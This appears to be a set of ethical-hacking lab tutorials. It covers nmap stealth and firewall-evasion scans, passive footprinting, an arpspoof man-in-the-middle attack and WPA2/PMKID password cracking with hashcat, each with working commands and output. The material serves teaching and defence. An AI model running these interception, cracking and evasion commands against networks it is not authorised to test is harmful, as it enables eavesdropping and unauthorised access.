Analysing the scan in wireshark we can see that the open port is responding to the handshake.

If the port is closed on the host, then the target host will respond with a RST+ACK packets.

The -sS switch sends only a TCP SYN packet and waits for a TCP ACK. If it receives an ACK on the specific probed port then it response with a RST packet, in this way the scan can be undetected by the firewall. If the scanned port is closed on the target host, then target will only respond with a RST packet.

nmap -sS 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:24 W. Europe Daylight Time
Nmap scan report for 192.168.100.11

Host is up (0.0013s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds

Analysing the packets in wireshark we can see that we first send a SYN packet to the scanned port on the target host, if it port is opened the target will response wit a SYN+ACK packet and we respond back with a RST packet.

If the port is closed on the scanned target the we will get a RST+ACK back.

The -sU switch will scan after UDP ports, UDP is a connectionless protocol, UDP packets dose not have any ACK flag set, the UDP protocol don’t require the reviser to confirm that he revised a UDP packet.

If the there is a firewall enabled on the host or on the network you will get a response back “open|filtered ports” and a list of ports that are blocked by the firewall.

nmap -sU 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:58 W. Europe Daylight Time

Nmap scan report for 192.168.100.11
Host is up (0.0016s latency).
Not shown: 997 open|filtered ports
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 17.27 seconds

If the firewall is disabled then they will be no response back.

Inverse Scans

Description Command Example
Xmas scan nmap -sX [Target] nmap -sX 192.168.100.11
FIN scan nmap -sF [Target] nmap -sF 192.168.100.11
TCP Null scan nmap -sN [Target] nmap -sN 192.168.100.11
ACK scan nmap -sA [Target] nmap -sA 192.168.100.11

The -sX switch is called a Xmas Scan, when you scan a network or a target host with Xmax scan, the xmas scan sends a packet that contains multiple flags, the packet contains the URG, PSH & FIN flags. If the host have closed ports, it will respond with a single RST packet. If the ports are open on the host, then the host will respond as an open ports. Modern operating systems, firewalls and IDS drops this kind of packets if they are properly configured.

We will run the xmax scan against a windows server with firewall enabled.

nmap -sX 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:07 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

Observe the line “All 1000 scanned ports on 192.168.100.11 are open|filtered” the output is showing that all scanned ports are “open|filtered”. This means that the firewall are enabled on the target host.

Lets try the same scan but this time we will disable the firewall on our target host.

nmap -sX 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:13 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0012s latency).
All 1000 scanned ports on 192.168.100.11 are closed

Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

Now we get “All 1000 scanned ports on 192.168.100.11 are closed” this indicates that the firewall disabled.

The -sF switch scans the the host with a FIN scan, a FIN scan sends a packet with only the FIN flag set, this allows the packet to pass the firewall. If the port is open you will not get any respond, if the port is closed the target will respond with a RST packet.

When the firewall is enabled on the target the output will have a “open|filtered” response.

nmap -sF 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:51 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 27.19 seconds

If the firewall is disabled on the target the output will have a “are closed” response.

nmap -sF 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 18:06 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0019s latency).
All 1000 scanned ports on 192.168.100.11 are closed

Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

The -sN switch will scan the target with a NULL scan, the scan sends a packet without any flags set. if the NULL packet is sent to an open port, the will be no response back. If the NULL packet is sent to a close port, it will respond with a RST packet. This type of scan is easy to detect due that there are no reason to send a TCP packet without a flag.

When using the NULL scan the target will respond similar to the FIN and Xmaz scans.

The -sA switch send a packet with the ACK flag set when scanning a host, when the target receive the ACK packet it will replay with a RST packet. if the port is closed and the firewall is enabled the firewall will block the target host response and there will be no response back.

Observe the output in namp when the firewall is enabled.

nmap -sA 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:36 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are filtered

Nmap done: 1 IP address (1 host up) scanned in 27.58 seconds

If the firewall is enabled the “All 1000 scanned ports on 192.168.100.11 are filtered” line will comeback with the “filtered” value. The “filtered” response shows that a firewall is enabled in the system.

Running the same command against a target with a disabled firewall, the output will have a different value.

nmap -sA 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:39 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0013s latency).
All 1000 scanned ports on 192.168.100.11 are unfiltered

Nmap done: 1 IP address (1 host up) scanned in 7.23 seconds

The response back on the “All 1000 scanned ports on 192.168.100.11 are unfiltered” is coming back with the “unfiltered” value. The response back means that there are no firewall enabled on the target.

Firewall Evasion

Description Command
Idle zombie scan nmap -sI [zombie] [target]
Use a decoy nmap -D RND: [number] [target]
Fragment packets nmap -f [target]
Specify MTU nmap –mtu [MTU] [target]
Randomize scan order nmap –randomize-hosts [target]
Send bad checksums nmap –badsum [target]
Specify source port nmap –source-port [port] [target]
Spoof MAC Address nmap –spoof-mac [MAC|0|vendor] [target]

The -sI is called a Idle scan or a zombie scan is a stealth technique, when using the a zombie scan packets revised on the scanned host cant be traced back the sender, all network traffic to the target host are going trough a second host on the network called “zombie”.

For a more detail explanation on how the idle scan work i recommend to read the official nmap documentation at https://nmap.org/book/idlescan.html

The -f switch is used to fragment probes into 8-byte packets, the scan will split the TCP header up to several packet, it is a very effective way to hide thee and make it harder for intrusion detection systems to the detect the scans.

The -D switch is used to hide port scans by using one or more decoys IP address,the network traffic on the scanned host will appear coming from the decoys IP address.

The –source-port switch is used to manually specify the source port number of a probe.

The –-randomize-hosts switch is used to randomize the scanning order of the specified ping sweap or a range scan.

Script Engines

Description Command
Run script nmap –script [script.nse] [target]
Run scripts nmap –script [expression] [target
Run scripts by category nmap –script [cat] [target]
Run multiple scripts categories nmap –script [cat1,cat2,cat3] [target]
Update script database nmap –script-updatedb
Script categories all
discovery
default
auth
external
malware
vuln
intrusive
safe

Useful scans

Find Information about IP address

nmap --script=asn-query,whois,ip-geolocation-maxmind [target]

Detect Heart bleed SSL vulnerability

nmap -sV -p 443 --script=ssl-heartbleed [target]

Scan for DDOS reflection UDP services

nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr [target]

Scan HTTP Service

Get page titles

nmap --script=http-title [target]

Get HTTP headers

nmap --script=http-headers [target]

Recommended sites

https://highon.coffee/blog/nmap-cheat-sheet/

Conclusion

We have looked into some of the scanning techniques we can use with nmap.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




Footprinting and Reconnaissance

Footprinting and Reconnaissance

Footprinting is the process of using various tools and techniques to understand and learn the targets infrastructure and vulnerabilities.

In the initial phase we wan to find out as much as possible from gathering information that is publicly available without actually interacting with the scanned target. This kind of attack can be passive or pseudonymous.

Here are some of the of information you can gathered about a target during footprinting.

  • Websites
  • Alternative Websites
  • Domain names
  • Network blocks
  • Specific IP addresses
  • Network services and applications
  • System architecture
  • Authentication mechanisms
  • Access control mechanisms
  • Employee email & Phone numbers
  • Contact addresses

In this lab we will use tools like ping, tracert and search engines to obtain information about a our target.

lets start with the basic ping command. In this lab series i will use www.hackthissite.org to try out my attacks.

“Hack This Site is a free training ground for users to test and expand their hacking skills. Our community is dedicated to facilitating an open learning environment by providing a series of hacking challenges, articles, resources, and discussion of the latest happenings in hacker culture. We are an online movement of artists, activists, hackers and anarchists who are organizing to create new worlds.”

Open CMD and ping a your favorite site, i am pinging www.hackthissite.org

C:\>ping www.hackthissite.org

Pinging www.hackthissite.org [137.74.187.102] with 32 bytes of data:
Reply from 137.74.187.102: bytes=32 time=40ms TTL=45
Reply from 137.74.187.102: bytes=32 time=40ms TTL=45
Reply from 137.74.187.102: bytes=32 time=40ms TTL=45
Reply from 137.74.187.102: bytes=32 time=40ms TTL=45

Ping statistics for 137.74.187.102:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 40ms, Maximum = 40ms, Average = 40ms

C:\>

We can see that the site replied with its IP address which is 137.74.187.102.

Now when we have the IP address we can use tracert to see the path the trafic is taking from your client to www.hackthissite.org

C:\>tracert 137.74.187.102

Tracing route to hackthissite.org [137.74.187.102]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  192.168.10.1
  2     1 ms     1 ms     1 ms  h85-209-118-1.cust.a3fiber.se [85.209.118.1]
  3     1 ms     1 ms     1 ms  gsl-bbr-1-be102.net.comhem.se [213.200.167.80]
  4     4 ms     9 ms     6 ms  gbg1.dr2.a3network.se [88.129.174.24]
  5     1 ms     1 ms     1 ms  gbg1.a3network.se [88.129.128.62]
  6     1 ms     1 ms     1 ms  gbg1.cr1.a3network.se [85.8.9.16]
  7     7 ms     7 ms     7 ms  sto2.cr1.a3network.se [85.8.10.20]
  8    29 ms    18 ms    18 ms  s-b10-link.telia.net [213.248.93.188]
  9    18 ms    17 ms    19 ms  s-bb4-link.telia.net [62.115.119.80]
 10    33 ms    33 ms    33 ms  ffm-bb4-link.telia.net [62.115.138.105]
 11    34 ms    51 ms    30 ms  ffm-b1-link.telia.net [62.115.137.169]
 12    39 ms    39 ms    39 ms  be100-163.fra-5-a9.de.eu [178.33.100.250]
 13   222 ms    44 ms    45 ms  be103.rbx-g2-nc5.fr.eu [94.23.122.240]
 14     *        *        *     Request timed out.
 15     *       40 ms     *     vl7.vss-10b-6k.fr.eu [178.33.100.218]
 16    40 ms    40 ms    40 ms  hackthissite.org [137.74.187.102]

Trace complete.

C:\>

With the tracert command we can fallow the trafic trough all routers and firewalls until we arrive to the website.

Use www.netcraft.com To Obtain More Data

Open www.netcraft.com in your web browser, In the right menu under “What’s that site running?” enter www.hackthissite.org the result page will open. Here we can see all the subdomains the site have.

On the result page click on the site report next to the domain name, a new page will load with information like email address, physical addresses, OS versions, Web Server version and a lot more.

Use WHOIS to obtain domain name information

WHOIS is a database that have information about domains and information about the people that own them. Using this tool give you the potential to gather personal information about the people that you can later use when doing social engineering. As well as collecting information as:

  • Information about the owner
  • Contact information
  • Location
  • Domain name servers
  • The IP address
  • The date of created

There several ways to use “WHOIS” like online services, applications and from command line, use the method that you are that you are comfortable with. If you are using a windows client then you need to download WHOIS, there is no need to install anything if you are using Kali Linux.

In this example we will show you how to use WHOIS from windows command line. Download WHOIS from Microsoft from https://docs.microsoft.com/en-us/sysinternals/downloads/whois and extract the files to the C:\ drive root.

Open CMD and type in whois [-v] domainname [whois.server]

C:\>whois -v hackthissite.org

Whois v1.20 - Domain information lookup
Copyright (C) 2005-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

Connecting to ORG.whois-servers.net...
Server ORG.whois-servers.net returned the following for HACKTHISSITE.ORG

Domain Name: HACKTHISSITE.ORG
Registry Domain ID: D99641092-LROR
Registrar WHOIS Server: whois.enom.com
Registrar URL: http://www.enom.com
Updated Date: 2019-01-14T03:31:05Z
Creation Date: 2003-08-10T15:01:25Z
Registry Expiry Date: 2019-08-10T15:01:25Z
Registrar Registration Expiration Date:
Registrar: eNom, Inc.
Registrar IANA ID: 48
Registrar Abuse Contact Email: abuse@enom.com
Registrar Abuse Contact Phone: +1.4252982646
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Whois Privacy Protection Service, Inc.
Registrant State/Province: WA
Registrant Country: US
Name Server: C.NS.BUDDYNS.COM
Name Server: F.NS.BUDDYNS.COM
Name Server: G.NS.BUDDYNS.COM
Name Server: H.NS.BUDDYNS.COM
Name Server: J.NS.BUDDYNS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
>>> Last update of WHOIS database: 2019-02-09T22:32:34Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

Use internet archives to get old versions of websites

“The Internet Archive, a 501(c)(3) non-profit, is building a digital library of Internet sites and other cultural artifacts in digital form. Like a paper library, we provide free access to researchers, historians, scholars, the print disabled, and the general public”

Use internet archives like the wayback machine to get old versions of sites and check if you can find vulnerabilities or if you can extract other useful information from old versions of the site.

Use Google Hacking

Google hacking is an information gathering technique that uses Google search queries to identify vulnerabilities in web applications, gather information of individual targets, discover errors, disclosing sensitive data, discover credentials and other sensitive information.For more information on google hacking scripts please search https://www.exploit-db.com

The cache operator finds the recent cache value of a website.

cache:www.hackthissite.org

The link operator lists pages linking to a specific domain or URL.

link:www.hackthissite.org

The info operator displays information about a page.

info:www.hackthissite.org

The site operator restricts the search to a specific site.

site:www.hackthissite.org

The allinurl operator only returns specified keyword in URL.

allinurl:network camera

The allintitle operator returns specified keyword in title.

allintitle:online-it.nu

Website gathering tools

There are many tools one can use to extract and gather information from the targets websites. Below are some examples of browsers plugins and applications that you can use.

  • Web Data Extractor 8.3 Link
  • Firebug plugin for Chrome
  • HTTrack Website Copier For Windows Link

Gathering information from DNS

If the target have some kind of public facing server then they will have some kind of a DNS servers, we can use DNS to gather information about email servers and other servers that the target is utilizing by analyzing the record types of the DNS server. List of DNS records typs.

There are many tools online and offline you can use to gather information about DNS, in this example we are using nslookup, to use nslookup open command line in windows or shell in linux and type in nslookup and the FQDN or the IP address of the target.

Below are some examples of DNS query’s.

# Check DNS A record
C:\>nslookup
Default Server:  8.8.8.8
Address:  8.8.8.8

> set type=a
> www.google.se
Server:  8.8.8.8
Address:  8.8.8.8

Non-authoritative answer:
Name:    www.google.se
Address:  216.58.207.227

# Check DNS mx record
C:\>nslookup
Default Server:  8.8.8.8
Address:  8.8.8.8

> set type=mx
> live.se
Server:  8.8.8.8
Address:  8.8.8.8

Non-authoritative answer:
live.se MX preference = 10, mail exchanger = eur.olc.protection.outlook.com

eur.olc.protection.outlook.com  internet address = 104.47.126.33
eur.olc.protection.outlook.com  internet address = 104.47.124.33

We have looked at the basic tools you can utility’s when footprinting a target, we have looked on how to find information of a target without interacting whit the target.

The are allot of tools you can use under the footprinting phase, as always google is your best friend, there is tons of information out there.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




How To Setup A Man In The Middle Attack Using ARP Poisoning

Man In The Middle Attack (MITM) enables the attacker to eavesdrop and alter the communication between two parties. The attacker is able to redirect the flow of packets from any client on the network to his client. That means that any packet that is sent to or from the victim will go through the attackers client.

In this lab we will show you how to setup a man in the middle attack (MITM) using ARP poisoning . The ARP poisoning attack allows us intercept communications across a network, this allows us to sniff any trafic going from the target machine to the internet or a server on the intranet. Any unencrypted communication will be readable for us.

ARP poisoning takes advantage of the ARP protocol function that lets any device send an ARP replay packets to other devices on the same subnet and force them to update there ARP cache tables with new values. The attack will trick the target to think it is communicating with a new router, but in reality all communication is going through the attacker.

We will use arpspoof which is a utility in Kali Linux that allows us to send a load of unrequested ARP responses to a target machine, telling it that the mac-address of the router has changed from what it was to our mac-address,we will use Wireshark to sniff the network traffic coming from our target client.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Preparation For The Lab

It is recommended that you have you some understanding on how ARP works and how clients communicate over layer 2 on the OSI model before you do the exercise.

For this exercise we want to install two client machines running on Virtualboxor or VMware Workstation Player. We are setting up a attacker client that is running on Kali Linux and a target client running on Windows 7, both clients have IP address on the same LAN.

Client IP Address Gateway
Attacker 172.168.10.60/24 172.168.10.2
Target 172.168.10.70/24 172.168.10.2

Start The ARP Poisoning Attack

Firstly we need to setup IP forwarding on the Kali Linux (attacker) client, open a terminal and setup IP forwarding.

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

Next we want to get our default gateway, the IP address of the router.

sudo ip route

root@GalaxyS9:~# sudo ip route
default via 172.168.10.2 dev eth0 proto static metric 100
172.168.10.0/24 dev eth0 proto kernel scope link src 172.168.10.60 metric 100
root@GalaxyS9:~#

The default route for my lab router is 172.168.10.2

Next we want to to know the name of the interface we want to preform the attack on. We will use the wired connection eth0. Display connected network interfaces with “ifconfig”.

root@GalaxyS9:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.168.10.60  netmask 255.255.255.0  broadcast 172.168.10.255
        inet6 fe80::20c:29ff:fed0:e17a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:d0:e1:7a  txqueuelen 1000  (Ethernet)
        RX packets 512418  bytes 723638885 (690.1 MiB)
        RX errors 0  dropped 276  overruns 0  frame 0
        TX packets 214518  bytes 14530991 (13.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 254  bytes 25816 (25.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 254  bytes 25816 (25.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 3e:9d:73:0e:ef:85  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@GalaxyS9:~#

Now we can start our attack by starting arpspoof. Type arpspoof -h to display the help menu.

sudo arpspoof -i [Network Interface] -t [Target] -r [Default Gateway] 

sudo arpspoof -i eth0 -t 172.168.10.70 -r 172.168.10.2

The arpspoof utility will now proceed to send a load of unrequested ARP responses to the target, telling it that the address of the router has changed to our address.

root@GalaxyS9:~# sudo arpspoof -i eth0 -t 172.168.10.70 -r 172.168.10.2
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:c:29:df:35:24 0806 42: arp reply 172.168.10.2 is-at 0:c:29:d0:e1:7a
0:c:29:d0:e1:7a 0:50:56:e4:40:82 0806 42: arp reply 172.168.10.70 is-at 0:c:29:d0:e1:7a

We need to keep sending the ARP request all the time the attack is ongoing, because if you stop sending the ARP request eventually the target will figure out which is the right default gateway with the real mac-address.

Now open Wireshark on the Kali Linux client and start sniffing on eth0.

Next open a web browser on the target machine and open your favorite home page, in this example i will open www.facebook.com. Go back to the Kali Linux client and stop the trace. Analyzing the trace will show that the target opened www.facebook.com in his browser.

Conclusion

Always use sites that have SSL encryption and never send sensitive information over public WiFi. Intrusion detection and Intrusion prevention systems is the sysadmins best weapon together with enterprise graded hardware on the network.

Check out the Ethical Hacking notes for more Kali Linux quick guides.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Crack WPA/WPA2 Hash Using HashCat

How To Crack WPA/WPA2 With HashCat

The tutorial will illustrate how to install and configure HashCat on a Windows client and crack the captured PMKID or .hccap files using a wordlist dictionary attack.

“Hashcat is the self-proclaimed world’s fastest password recovery tool. It had a proprietary code base until 2015, but is now released as free software. Versions are available for Linux, OS X, and Windows and can come in CPU-based or GPU-based variants.”

The WPA2 handshake can be captured on a Linux compatible client like Kali Linux with a supported WiFi card running on VirtualBox. Then converted to the right format depending on the captured method and moved over to the Windows client to be cracked.

Use the guides Capturing WPA2 and Capturing WPA2 PMKID to capture the WPA2 handshake. For this test we will use the famous “Rockyou” wordlist.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Download HashCat

Hashcat do not require any installation, it is a portable program it requires you to unpack the downloaded archive.

  1. First you need to download Hashcat binaries from https://hashcat.net/hashcat/
  2. Navigate to the location where you saved the downloaded file, and unzip the file

Step 2: Download Wordlist

They are numerous wordlists out on the web, for this test we are going to use the famous “rockyou”.

  1. Open the hashcat folder on your hard
    drive and create a new folder called “wordlist”
  2. Download the
    rockyou.txt wordlist from this Link.
  3. Save the downloaded file in the new folder
    “wordlist”

Step 3: Prepare Your Captured WPA2 Handshake

Depending on the method you used to capture the handshake you either must format the cap file to 2500 hash-mode or the PMKID file to hashcat 16800 hash-mode .

For how to format the files please see the guides Capturing WPA2 and Capturing WPA2 PMKID.

In this lab we are using a captured PMKID and a pcpa handshake formatted to hashcat readable format. “HonnyP01.hccapx ” and ” HonnyP02.16800″.

I’m using two different home routers from D-Link and Technicolor for this experiment, both WiFi routers are owed by me.

  • The “HonnyP01.hccapx” file is captured from the D-Link router.
  • The ” HonnyP02.16800″ file is captured from the Technicolor router.

Step 4: Start Hashcat

You need to run hashcat in CMD or PowerShell. In this example we will use CMD to execute our commands and crack the handshake.

Open CMD and navigate to the hashcat folder.

C:\>cd hashcat-5.1.0
C:\hashcat-5.1.0>

Type hashcat64 -h to display all options

C:\hashcat-5.1.0>hashcat64 -h

 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor

- [ Workload Profiles ] -

  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless

- [ Basic Examples ] -

  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
  Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict

If you still have no idea what just happened, try the following pages:

* https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
* https://hashcat.net/faq/

C:\hashcat-5.1.0>

Step 5: Crack WPA2

In the First example we will illustrate how to get the password from a converted pcap file “.hccapx”.

Copy your converted file to the hashcat folder, in this example i am copying the file HonnyP01.hccapx to my hashcat folder.

Next we will start hashcat and use the wordlist rockyou, type in the parameters below in CMD.

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt"

  • hashcat64 the binary
  • -m 2500 the format type
  • -w 3 workload-profile 3
  • HonnyP01.hccapx the formatted file
  • “wordlist\rockyou.txt” the path to the wordlist

Hashcat will start processing the file, if you are successful the terminal will display the hash and the password.

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: wordlist\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

7005312a9933d3a57065450f0749f210:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
2fed89e93e2cd63175f435db16ca75f0:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password

Here we can see that hashcat was able to match the hash to a password in the wordlist, in this lab the password to the D-Link WiFi is “password”. You can chose to let the application run trough the wordlist or press “q” to quit.

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-EAPOL-PBKDF2
Hash.Target......: HonnyP01.hccapx
Time.Started.....: Fri Jan 18 20:13:27 2019 (42 secs)
Time.Estimated...: Fri Jan 18 20:14:09 2019 (0 secs)
Guess.Base.......: File (wordlist\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   230.7 kH/s (46.06ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 18/25 (72.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 4734913/14344384 (33.01%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:24-49
Candidates.#1....: $HEX[303531313037353434] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 66c Fan: 44% Util: 97% Core:1949MHz Mem:4006MHz Bus:16

Started: Fri Jan 18 20:13:12 2019
Stopped: Fri Jan 18 20:14:10 2019

C:\hashcat-5.1.0>

You can display the cracked password with the “show” command or by running the same command again, all cracked hashes will be stored in the “hashcat.potfile” in the hashcat folder.

To display the cracked password in CDM type the command bellow.

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt" --show

C:\hashcat-5.1.0>hashcat64 -m 2500 -w3 HonnyP01.hccapx "wordlist\rockyou.txt" --show
7005312a9933d3a57065450f0749f210:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
2fed89e93e2cd63175f435db16ca75f0:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
fcaf4223879e125e10a272f9234256fe:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
7617ef601966436708eae3ad2c02d295:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
8b5ddfc6bade402e38e2ce023449bf07:84c9b26a9e90:f4bf80c7ec46:HonnyP01:password
C:\hashcat-5.1.0>

In the next example we will run the same command except now we use the 16800 mode to run the dictionary attack against formatted PMKID file captured from the Technicolor router.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 "wordlist\rockyou.txt"

  • hashcat64 the binary
  • -m 16800 the format type
  • -w 3 workload-profile 3
  • HonnyP02.16800 the formatted file
  • “wordlist\rockyou.txt” the path to the wordlist

17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f*4c656f6e20322e342047487a:adsladsl

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c4988...47487a
Time.Started.....: Fri Jan 18 23:12:55 2019 (27 secs)
Time.Estimated...: Fri Jan 18 23:13:22 2019 (0 secs)
Guess.Base.......: File (wordlist\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   268.6 kH/s (51.75ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 11008839/14344384 (76.75%)
Rejected.........: 3636039/11008839 (33.03%)
Restore.Point....: 10261572/14344384 (71.54%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: aldohizo123 -> Juelle98
Hardware.Mon.#1..: Temp: 68c Fan: 43% Util: 95% Core:1847MHz Mem:4006MHz Bus:16

Started: Fri Jan 18 23:12:48 2019
Stopped: Fri Jan 18 23:13:24 2019

C:\hashcat-5.1.0>

Here we can see that the cracked password is “adsladsl” for the Technicolor router.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 "wordlist\rockyou.txt" --show
17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f*4c656f6e20322e342047487a:adsladsl

C:\hashcat-5.1.0>

Extra: Brute Force Attack And Rule based attack

You can let hashcat brute force the file with the command bellow.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 ?l?l?l?l?l?l?l?l

Or use ruled base attack.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 -r rules\best64.rule "wordlist\rockyou.txt" 

Conclusion

Your home or office WiFi can be hacked if you are using a weak password, as always a strong and complex password is still the best defense against an attacker.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Setup A Raspbian Hacking Station On Raspberry Pi 3B+

Step 1: Download and run Raspbian Stretch Lite 4.14

1.1 Download Raspbian Stretch lite

1.2 Use Win32DiskImager our a similar application to load the image on the SD card and start the Raspberry

Step 2: Enable SSH For Remote Access

2.1 Enable SSH service



2.2 Start the ssh service



2.3 Check ssh service status



